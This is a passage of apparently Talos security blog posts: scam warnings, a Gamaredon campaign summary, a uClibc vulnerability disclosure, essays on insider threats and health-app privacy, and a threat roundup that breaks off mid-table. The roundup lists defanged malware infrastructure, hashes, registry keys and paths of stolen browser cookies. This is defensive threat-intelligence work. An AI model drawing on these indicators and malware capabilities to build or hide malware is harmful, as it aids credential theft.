With that in mind, I felt it was important to remind folks of a few things with the real application to apply for student debt forgiveness reportedly coming in early October: 

  • As of right now, Sept. 22, there is no real or formal application to have a portion of your student debt forgiven. Don’t believe anything that says otherwise. 
  • There is no way to get early access to this program. Anyone offering this for a fee is very likely a scam. 
  • The U.S. Department of Education will not reach out with a phone call to communicate regarding this program, do not provide any requested information over the phone. 
  • Just because something shows up in the mail doesn’t mean it’s legit. Attackers are also likely to send phishing letters via traditional USPS delivery methods. 
  • And, as always: If it seems too good to be true, it probably is. 

The one big thing 


Ukraine is again the target of a state-sponsored actor, with the Gamaredon APT launching information-stealing malware against organizations and users there. Gamaredon is a well-known actor that’s been around for several years and usually aligns with Russian state interests. The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine. Talos researchers discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and deploy additional payloads as directed by the attackers. 

Why do I care? 

Gamaredon is actively targeting Ukrainian entities, specifically government organizations and critical infrastructure. These are all crucial industries to protect during Russia’s invasion of Ukraine, as they’ll likely be targeted regularly by state-sponsored actors. And as we outlined in last week’s Talos Takes, Gamaredon’s activities are not likely to remain isolated to Ukraine. 

So now what?

There are new Cisco Secure product protections in place to protect against this actor’s activities. Additionally, if you fear you could be targeted by this campaign, there are two artifcats to scan for on the system that can indicate a compromise: 
  • A registry key is created under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name "Windows Task" for persistence. 
  • A mutex is created with the name Global\flashupdate_r. 

 

Top security headlines from the week


Rideshare app Uber blamed the Lapsus$ ransomware group for a recent data breach. The company said the actor gained access to multiple internal Uber systems after stealing a third-party contractor's credentials and then tricking that user into approving a multi-factor authentication request. Uber engaged the U.S. Department of Justice and the FBI shortly after learning about the breach and is still investigating it. However, it does not appear that attackers accessed any customer or user data stored by its cloud providers, though they did download some internal messages and information from an internal finance team. (ZDNet, Washington Post

New York’s Suffolk County is still recovering from a cyber attack that’s affected multiple areas of the local government. The county’s 911 system was still offline as of Tuesday, with responders forced to switch to pen and paper for tracking emergency calls. They’ve also had to enlist the help of the New York City Police Department to assist with background checks. The attackers may have also stolen and leaked some residents’ personal information and have allegedly posted images of stolen documents on the dark web. The adversaries say they’ve demanded an unspecified “small amount” of money for the return of access to its computers. (NBC 4 New York, Newsday

The ChromeLoader malware is more dangerous than ever, according to new research from VMWare and Microsoft. Security researchers at the companies say the malware — which started as a browser-hijacking credential stealer — is now being used as a tool to deliver ransomware and steal sensitive information. The updated version of ChromeLoader has been used in hundreds of attacks over the past few weeks targeting enterprise networks in the education, government, health care and business services industries. Attackers are disguising ChromeLoader as legitimate Chrome browser services and plugins, such as OpenSubtitles, a site designed to help users to find subtitles for popular TV shows and movies. (Dark Reading, The Register


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

Vulnerability Spotlight: Vulnerabilities in popular library affect Unix-based devices

22 September 2022 at 09:00



Lilith >_> of Cisco Talos discovered these vulnerabilities. 

Cisco Talos recently discovered a memory corruption vulnerability in the uClibC library that could affect any Unix-based devices that use this library. uClibC and uClibC-ng are lightweight replacements for the popular gLibc library, which is the GNU Project's implementation of the C standard library. 

TALOS-2022-1517 (CVE-2022-29503 - CVE-2022-29504) is a memory corruption vulnerability in uClibC and uClibc-ng that can occur if a malicious user repeatedly creates threads. 

Many embedded devices utilize this library, but Talos specifically confirmed that the Anker Eufy Homebase 2, version 2.1.8.8h, is affected by this vulnerability. Anker confirmed that they’ve patched for this issue. However, uClibC has not issued an official fix, though we are disclosing this vulnerability in accordance with Cisco’s 90-day vulnerability disclosure policy. Talos tested and confirmed the following software is affected by these vulnerabilities: uClibC, version 0.9.33.2 and uClibC-ng, version 1.0.40. 

Insider Threats: Your employees are being used against you

22 September 2022 at 11:58
By Nick Biasini.
  • Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year.
  • Social engineering should be part of any organization’s policies and procedures and a key area for user education in 2023 and beyond.
  • Mitigating these types of risks include education, user/access control, and ensuring proper processes and procedures are in place when and if employees leave the organization.

Traditionally, attackers try to leverage vulnerabilities to deliver malicious payloads via exploitation. But more recently, that activity has shifted away from exploitation and consistently moved closer and closer to the user. Initially, threat actors loved to trick users into enabling malicious macros in Microsoft Office documents, but as Microsoft moves to blunt the effectiveness of macros, adversaries are always going to move to the next avenue to generate malicious revenue. This is where insider threats come into play. There are two broad categories of insider threats: the malicious insider and the unwitting asset. Both present unique challenges in detection and prevention for defenders and organizations’ IT admins. 


Malicious Insiders

There are a variety of reasons a user may choose to become a malicious insider, and unfortunately, many of them are occurring today. Let’s start with the most obvious: financial distress. When a user has a lot of debt, selling the ability to infect their employer can be a tempting avenue. We’ve seen examples of users trying to sell access into their employers’ networks for more than a decade, having spotted them on dark web forums. The current climate is, unfortunately, ripe for this type of abuse. The economy is on the brink of a recession, inflation continues to spike, and the cryptocurrency markets have lost as much as 70% of their peak value from late 2021. Combined, these factors can create an environment where employees are susceptible to coercion, putting the enterprise at risk.

Financial distress is a serious concern for employee compromise as evidenced by the fact that nearly half of the security clearance denials in the U.S. have to do with financial considerations. It is also a common factor in clearances being revoked, clearly demonstrating the risk it can present. This financial distress can also be leveraged by adversaries to force users to take actions they would not have otherwise by threatening to expose the issues publicly.

Financial distress isn’t the only factor that could drive an employee to turn against their employer. In today’s highly polarized political climate, the risk that an employee may take malicious action against their employer due to a perceived political stance from the employer is ever present. These could be spurred on by the action or inaction organizations take related to a piece of legislation or other societal issues. These risks, although less common than financial distress, present unique challenges to employers as they try to navigate the current political climate and closer to the 2024 presidential election.

The final risk for enterprises comes from employees that have recently left the organization — especially if the separation was not mutual. Employees that have been forced to resign or fired from their jobs may take matters into their own hands. It’s this group that is typically focused on destruction that can really wreak havoc inside an organization.

At the least, malicious insiders may be willing to click links, open attachments, plug in a USB drive, or hand over credentials. In a worst-case scenario, if the malicious insider has an elevated level of access, the effects could be devastating. This is the primary insider threat organizations face, but they also need to be prepared for the user that is being used as an unwitting asset, typically via social engineering.


Unwitting Assets

This other category of insider threat is the more challenging of the two to deal with, as they likely aren’t aware they are acting maliciously. Social engineering attacks are on the rise, we see social engineering becoming a more prominent part of the attack lifecycle as we continue to improve things like exploit detection and prevention. Social engineering attacks are those that focus around leveraging the user to aid in the infection, typically through some form of manipulation. It played a role in the recently disclosed incident affecting Cisco, as well. Social engineering has some obvious applications, as we’ve seen repeatedly in the Business Email Compromise (BEC) space. It isn’t uncommon, especially for the more sophisticated groups, to open with a request for a phone number to discuss an issue further.
Example of Business Email Compromise (BEC) campaign leveraging social engineering

The attackers have realized that if they can get a potential target on the phone, it’s far easier for them to extract money, as people tend to want to help and can be better manipulated over the phone. This is far from the only way users are becoming unwitting assets.

As we continue to deploy multi-factor authentication (MFA), attackers are getting better at evading it, commonly through social engineering. Through our investigations, we have found numerous examples where attackers pose as IT Support or Security Operations inside an organization and call the victim, using social engineering to get them to accept the MFA request as they are sending it to the device. This was similar to the approach we saw taken in the recently disclosed attack against Cisco, where voice phishing played a role in the sophisticated attack, illustrating how once attackers have people on the phone, they can more easily manipulate them.

The other space where social engineering attacks have been occurring at pace is the cryptocurrency and web3.0 space, even though the value of cryptocurrencies has cratered recently. Cisco Talos has talked at length about the ways scams have emerged in Web 3.0, but social engineering attacks against NFT/Cryptocurrency users are increasingly common. Users are commonly approached if they post about having issues with their accounts, with criminals waiting to defraud them out of whatever value they have in their wallets. These attacks are widespread, as users posting anything related to issues with MetaMask can attest, they will find you quickly. Most of the time, it seems innocuous with the adversary asking the target to fill out a form, but in the end, adversaries are after users’ mnemonic password, allowing the attacker to empty the wallet with little recourse for the victim.


Example "support" form asking for meta mask mnemonic password


Defending against insider threat

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost, they typically are allowed to access the network and have valid login credentials. This is where traditional security controls like user and access control come into play. Organizations should limit the amount of access a user has to the minimum required for them to perform their job. This should prevent them from accessing documents or systems that they shouldn’t and, along with proper alerting logic, should generate alerts if they attempt to access something they shouldn’t. Users make mistakes and click things occasionally, but a user being denied 15 - 20 times in a short period should be investigated.

Additionally, administrators should ensure that the organization has proper defense-in-depth and is inspecting laterally across the organization and not just analyzing traffic traversing your boundary or going north/south. This will ensure if the user is being leveraged to help the attackers, whether willing or otherwise, there are solutions in place to detect and block it. 

This is also where routine auditing can play a role. It’s common for an account to be created for testing or other purposes and forgotten, these types of accounts can be devastating if missed. Additionally, auditing the access users/groups have regularly can eliminate things like access hoarding, group sprawl and permission creep, which results in users having far more access than they should.

For those organizations that deal with financial transactions, ensure that there is a system of checks and balances in place so no one single person can initiate and complete a wire transfer or other significant movement of funds without additional oversight and approval. Too often, have we seen organizations without these types of controls have significant amounts of money leave via BEC or another financially motivated social engineering attack.

Finally, there is the issue of what to do when someone leaves the organization. There are some obvious steps like disabling their accounts and ensuring they can’t connect to the enterprise remotely through VPN. However, less obvious is ensuring the user doesn’t have any existing connections and, in today’s hybrid work world, it’s likely they will still have access to company assets, including laptops and other systems. Implementing a mechanism to wipe those systems remotely will be important, as well.

There are additional steps organizations need to take, specifically for users with an increased level of access. Rotate shared credentials — in a perfect world, this wouldn’t be an issue, but we’ve all worked in organizations where shared credentials are a thing and can commonly be abused by recently departed team members. Along those same lines, rotate any cloud credentials. Today, almost all organizations have some or most of their data hosted in the cloud and there are ways to access that data from outside the organization. These lines of access should be addressed when key employees leave the organization. 

One final step is to create some detection logic to look for login attempts from disabled users. This will at least will give admins some level of indication that a former employee could be attempting to establish access. Likewise, admins and defenders should ensure all service accounts cannot login directly which can be configured via Group Policy, as they can also be abused by a malicious insider if misconfigured, resulting in an elevated level of access ripe for abuse.

Regarding unwitting assets, the key is user education. Enterprises should include social engineering attacks as part of their red teaming or other pentesting that occurs regularly. Additionally, they should roll out specific training to employees to educate them on social engineering. This needs to include what normal MFA activity looks like, the ways that support would contact users and the types of things you should never share, and finally, for financial organizations/departments, understanding how money transfers should be handled and vetted.


Insider threats increasing

Over the past six months to a year, we have seen an increasing amount of incident response engagements involving malicious insiders and unwitting assets being compromised via social engineering. As we continue to improve the ways we can detect and stop active exploitation and as macros are slowly removed from the landscape, the options for adversaries are going to dwindle. 

Realize they are always going to take the path of least resistance, historically that meant active exploitation, more recently it fell to maldocs, and in the future, it’s likely going to fall increasingly to social engineering attacks and turning a user into a malicious insider. Unfortunately, as the payouts have shown, the amount of money at play is significant and they will likely find users willing and able to take that leap to the dark side.


Our current world, health care apps and your personal data

20 September 2022 at 14:00

What does your autonomy mean to you?



By Ashlee Benge and Jonathan Munshaw.

  • After the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization, the use of third-party apps to track health care has recently come under additional scrutiny for privacy implications.
  • Many of these apps have privacy policies that state they are authorized to share data with law enforcement investigations, though the exact application of those policies is unclear.
  • The use of health-tracking apps and wearable tech is rising, raising questions around the application of the 14th Amendment’s equal protection clause and HIPAA rules as to who can and cannot collect and share health care information. 

It’s become second nature for many users to blindly click on the “Accept” button on an app or website’s privacy policy and terms of service. But in the wake of the U.S. Supreme Court’s ruling in Dobbs v. Jackson Women’s Health Organization that reversed previous interpretations of the 14th amendment on privacy from Roe v. Wade, users of sensitive health apps need to be mindful of the kinds of data these apps keep, sell and share. It is a privacy ruling at its core, with the decision raising concerns about the government’s ability to access our personal and private information. Today’s digital surveillance infrastructures, coupled with new and existing laws, digital health histories are nearly impossible to protect.

The use of health data tracking applications and wearable tech has rapidly increased in the past several years. These apps track a hodgepodge of data, from heart rate and blood oxygen level, to when and where a user works out, to what a user eats. Some of these fitness applications even track more sensitive data like sexual activity, body composition using progress photos, and sleep cycles. Blood glucose levels can be tracked continuously using a wearable sensor and app rather than routinely timed finger pricks. 

Privacy policies are only so private

Although there are stringent laws regarding the use of personally identifiable information tied to health records, there are grey areas in the way this legislation applies to the data collected by healthcare apps. Additionally, if the servers of these apps are breached or otherwise compromised, there may be no liability to the app. This breached data is often sold on readily accessible marketplaces. But even if there’s no breach or illicit use of this information, apps and their creators can still learn a great deal about users. 

When health data collected by these apps is combined with other datasets like location data and what is available on social media profiles, advertisers, law enforcement agencies and more can craft a shockingly comprehensive view into the user’s life. In some instances, this inferred profile can be used for nefarious purposes, even resulting in criminal charges. Even prior to recent rulings, police in Nebraska launched an investigation using Facebook messages, eventually leading to criminal charges. In July 2021, a Catholic publication used location data tied to Grindr activity, purchased from a data aggregator, to allege that a high-ranking bishop was potentially gay. This allegation ultimately led to the bishop’s resignation

Some of the most sensitive data tracked by users of health apps is in period and pregnancy tracking apps. These apps track things like period timing and symptoms, user-provided notes and comments, ovulation periods for those who are trying to get pregnant, and fetal growth process throughout pregnancy. Many of these apps state that they do not sell or share user data in their privacy policies. However, there are often exceptions for law enforcement requests. In the aforementioned case in Nebraska, Meta, Facebook’s parent company, complied with the investigation by giving law enforcement data on two people involved in compliance with its privacy policy and regulations.

PII on especially sensitive apps

Since the ruling, there have been continuous calls for users to delete apps tracking this information. Although laws like HIPAA in the United States stringently regulate the use and sharing of health records by traditional providers, these laws do not apply in the same manner to third-party health apps. These apps function as what is called a “designee,” and in some cases, can share data provided by users without their direct consent. This is because health tracking apps are considered “non-covered entities.” 

HIPAA only applies to covered entities, defined as health plans, healthcare clearinghouses, and specifically defined providers and associates. Apps typically do not fall within these definitions unless they are provided by a user’s insurance company or healthcare provider. Because HIPAA does not apply and there is limited legislation preventing it, these apps are free to sell and share your personal health data in a way that your doctor cannot.

Privacy watchdog organizations fear that, with this ruling, the laws around data sharing could be loosened. The right to privacy, interpreted to be provided by the 14th Amendment (along with others) has been used as precedence for a myriad of other laws outside of women’s reproductive rights, such as the legalization of same-sex marriage in the U.S. Privacy watchdogs are speculating that undermining these rights could allow for the sharing of personally identifiable health records to be used to determine insurance rates, with higher rates for individuals deemed to be high risk, or even for health records to be shared with current or prospective employers. In a world with no regulations against the sharing of health records on health apps, your medical diagnoses or level of risk inferred from your nutrition or workout trackers, could be used against you.

Without legislation preventing the sharing of your health data, app privacy policies are the only barrier to your data being shared or sold without your consent. These privacy policies tend to vary between individual apps, however. 

What some popular apps’ policies say

Screencap of a portion
of What to Expect's
privacy policy taken
on Aug. 10, 2022.
What to Expect is one of the most popular pregnancy apps currently available on all platforms. This app is widely used by users who are either currently pregnant or trying to become pregnant, ranked No. 52 in Health and Fitness on the Apple app store, with nearly 300,000 positive reviews. In addition to data actively provided to the app, the app’s Privacy Policy states several other layers of personally identifiable information (PII) are collected, including the user’s expected due date, any photographs posted to the app, demographic information like gender and age, contact details, location information and “any views or opinions you provide to us.” 

However, the app’s policies also state it will process that information when “conducting investigations where necessary” and in “compliance with applicable law.” The policy also states:

"We may disclose your User Information to legal and regulatory authorities; our external advisors; parties who Process User Information on our behalf (“Processors”); any party as necessary in connection with legal proceedings; any party as necessary for investigating, detecting or preventing criminal offenses; any purchaser of our business; and any third party providers of advertising, plugins or content used on the Services. Other apps and services have overhauled and strengthened their privacy and data-sharing policies in response to changing abortion laws."

Flo, a popular period tracking app, recently announced a new “anonymous” mode that will allow users to completely remove their personal and device information from the app and leave the company without any access to their data should a law enforcement agency request it. 

"If Flo were to receive an official request to identify a user by name or email, Anonymous Mode would prevent us from being able to connect data to an individual, meaning we wouldn't be able to satisfy the request," the company’s CEO said in an email to users announcing the new features. 

For any users not using Anonymous mode, Flo’s default privacy policy permits the app to share PII with a third-party advertising company, AppsFlyer, which then uses that information to generate curated ads on several other platforms, such as the social media app Snapchat and Google sites. 

Information from the Flo app
regarding the sale of users' data
for advertising purposes. 
Astrology-focused menstrual tracking app Stardust also announced earlier this year that it changed its privacy policy to clarify that it would not provide user data if requested by law enforcement. And Clue, a European-based app that tracks menstrual cycles, and pregnancies and offers its own form of birth control, says it will not cooperate with any U.S.-based law enforcement investigations.

For other, less-recognized apps, policies vary greatly and leave the door open for data-sharing with law enforcement if users are not careful about investigating their privacy policies and information-sharing agreements. 

On the Android app store, searching for “Period tracker” surfaces several non-mainstream apps as top results, such as “Period Calendar Period Tracker.” That app offers users predictions on when users’ next period will begin, peak ovulation times and any symptoms they’re experiencing on specific days and times. 

The app’s privacy policy states that it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only."

The app’s Android store page does advertise that it doesn't share any data with other companies or organizations, though some of the service providers they partner with might sell it.

The store page for the app also contains an image claiming that it is “Verified by Privacy International,” a U.K.-based privacy-focused non-profit organization. Period Calendar Period Tracker was mentioned in a 2019 study listing which period-tracking apps did or did not share data with Facebook — at the time, the app did not share information with Facebook. However, a representative from Privacy International told Talos the organization has no relationship with the app, nor does it verify or certify certain apps based on their privacy policies.


Things to consider when downloading health care-related apps

  • As data privacy law changes rapidly, users should be more mindful of the types of information and data they share with these apps. Outside of switching to a traditional pen-and-paper calendar method, there are a few tips users can follow when considering using an app that tracks health data of any kind, particularly the kinds of sensitive data tracked by period or pregnancy tracking app:
  • Carefully evaluate privacy policies before downloading and using an app, and don’t hesitate to reach out to listed contacts for additional information. Be aware that if an app’s privacy policy does not include a section titled “Notice of Privacy Practices for Protected Health Information," HIPAA does not apply, and there is limited legislation preventing the app from selling or sharing your health data. 
  • Be mindful about the types of information you share with these apps and evaluate your level of risk were this information to become public. Ensure you are only sharing information with these apps that you are comfortable with potentially becoming public without your consent.
  • If allowed by the app, opt out of all data collection and information sharing. Many apps will offer this option because of GDPR rules in Europe or California’s recently passed California Consumer Privacy Act.
  • Only download apps from trusted stores and trusted developers.
  • Use anonymous modes if offered by the app.

Note: Representatives from Period Calendar Period Tracker and What to Expect did not respond to a request for comment via emails sent to their publicly listed contact information in the respective apps’ privacy policies.


Threat Roundup for September 9 to September 16

16 September 2022 at 17:24

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 9 and Sept. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.LokiBot-9969312-0 Dropper Lokibot is an information-stealing malware designed to siphon sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from several popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Zeus-9969310-0 Dropper Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Dropper.Nanocore-9969309-0 Dropper Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Ransomware.Cerber-9969274-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber." In more recent campaigns, other file extensions are used.
Win.Dropper.DarkKomet-9969269-0 Dropper DarkKomet is a freeware remote access trojan released by an independent software developer. It provides the same functionality expected from a trojan, such as keylogging, webcam access, microphone access, remote desktop, URL download and program execution.
Win.Dropper.Ramnit-9969260-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It can also steal browser cookies and hides from popular antivirus software.
Win.Dropper.Kuluoz-9969050-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.Remcos-9969014-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. It is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.

Threat Breakdown

Win.Dropper.LokiBot-9969312-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
3
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN 2
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA THUNDERBIRD 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\ENUM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\OWUZ370WDG 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\ENUM
Value Name: Implementing
1
Mutexes Occurrences
3749282D282E1E80C56CAE5A 1
-1L3OO7B8T5U3Hz8 1
86R24Q1820DI8G-5 1
0-RAP0BC8AFXV5YK 1
O926B232S79XBxBC 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
111[.]118[.]215[.]251 2
104[.]18[.]114[.]97 2
85[.]159[.]66[.]93 1
149[.]154[.]167[.]220 1
217[.]26[.]48[.]101 1
81[.]17[.]18[.]196 1
151[.]101[.]2[.]159 1
2[.]57[.]90[.]16 1
66[.]235[.]200[.]147 1
3[.]64[.]163[.]50 1
34[.]117[.]168[.]233 1
183[.]90[.]232[.]14 1
64[.]190[.]63[.]111 1
162[.]213[.]253[.]236 1
103[.]63[.]2[.]157 1
109[.]123[.]121[.]243 1
66[.]225[.]241[.]38 1
149[.]129[.]252[.]201 1
162[.]240[.]46[.]240 1
209[.]159[.]145[.]117 1
81[.]161[.]229[.]75 1
104[.]21[.]81[.]107 1
160[.]121[.]173[.]6 1
129[.]226[.]173[.]87 1
66[.]96[.]162[.]150 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
icanhazip[.]com 2
mail[.]mayhighfilms[.]com 2
www[.]awesomegih[.]net 1
www[.]european-resilience[.]org 1
www[.]eminefendipsikoloji[.]xyz 1
www[.]solutionsdr[.]website 1
www[.]jeuxjetx[.]fr 1
www[.]mjmedia[.]online 1
www[.]ct666666[.]com 1
www[.]aceyourexams[.]org 1
www[.]famallcameroon[.]com 1
www[.]kevinandboots[.]com 1
www[.]grupoprius[.]com 1
www[.]6298vip15[.]com 1
www[.]goinuffies[.]com 1
www[.]strcktunkea[.]xyz 1
www[.]wettenunseam[.]xyz 1
www[.]998899[.]lc 1
www[.]gurilab[.]com 1
www[.]825766[.]com 1
www[.]agenlexispkr[.]xyz 1
www[.]randrconstruction[.]site 1
mail[.]nu-meqa[.]com 1
www[.]tbwtaobao[.]org 1
www[.]nineodesign[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%ProgramFiles%\Microsoft DN1 1
%LOCALAPPDATA%\Microsoft Vision 1
%APPDATA%\D282E1 1
%APPDATA%\D282E1\1E80C5.lck 1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 1
%APPDATA%\ndwgxitf.y2z 1
%APPDATA%\Microsoft\Windows\TEMPLA~1\fgfhgf.exe 1
%APPDATA%\ndwgxitf.y2z\Firefox 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\ndwgxitf.y2z\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\A1EB383543D3F00657D7 1
%APPDATA%\Microsoft\Windows\Templates\BCRHYN5A.zip 1
\TEMP\f400n12e.0.cs 1
\TEMP\f400n12e.cmdline 1
\TEMP\f400n12e.err 1
\TEMP\f400n12e.out 1
\TEMP\f400n12e.tmp 1
\x5c\x55\x73\x65\x72\x73\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x5c\x41\x70\x70\x44\x61\x74\x61\x5c\x52\x6f\x61\x6d\x69\x6e\x67\x5c\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x5c\xac0e\xac27\xac09\xac17\xac18\xac18\xac10\xac0f\xac20\xac15\x2e\xac02\xac12\xac27\xac14\xac16\xac0d\xac05\xac1e\xac26\xac05 1
%APPDATA%\rxbyry3j.lyu 1
%APPDATA%\rxbyry3j.lyu\Firefox 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\rxbyry3j.lyu\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\gmzjfop1.kr5 1
*See JSON for more IOCs

File Hashes

00fdc4ec48b20f242022329109dc1e46b881a9f044f8d3d2c41c5071f13f284f 0a3b4186c412949b09fb35b24d0b7cfaab2726008c9dfd9ded81042678656a79 0bcfde1f70aeca56465e84252d3fed352a44686c52f1201e4474d5c126888842 17c40b93caacb07d7cb74d9bc9613780f3d346f5211323baa996e6516f830761 209ae4bb19c3fa5f5fd635e0bf9488ffc1b996edca12dcbd3771c5f6c560f9f9 2f64045ea223d08dd7556ac4d77b48153a96f881a0809e1c8ead0db9f6233884 36b098518b9abac620afde7568f084a592d1b43d50abdd8c70e030bca546b0e9 385203173d2547ac9df7af8711b18f9bff87c085e578e09a9a0999e2410a8744 41779f5ac5669c9d785d8348ee0cd0c03b31e0b260325995734cf67196eaa335 46ef92bfc91030701e6b5518deb8aba193a86e07ab8c63c0502a22e8acd9bc15 477038c22b79299bdd29784b5fa4d666735b962011b70f86fb6576fb690614b9 60214bf0cf8621867b6c69ffe98b203b8bec0c8f4a2144874b01f9f8c8a1cee6 a7157198068ee89caac77d8174b1e75bd71a42e0b3bb66ecbf9cbf05533f2153 bfdf0c6aa301a9305c58a7f3c4ef2a6b5ae2b3125600368acb8d0fb677e1b8a3 e602d598e6a30b8a9970e32469a499576fdc8bb987995add758221aa63142ed0

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Zeus-9969310-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
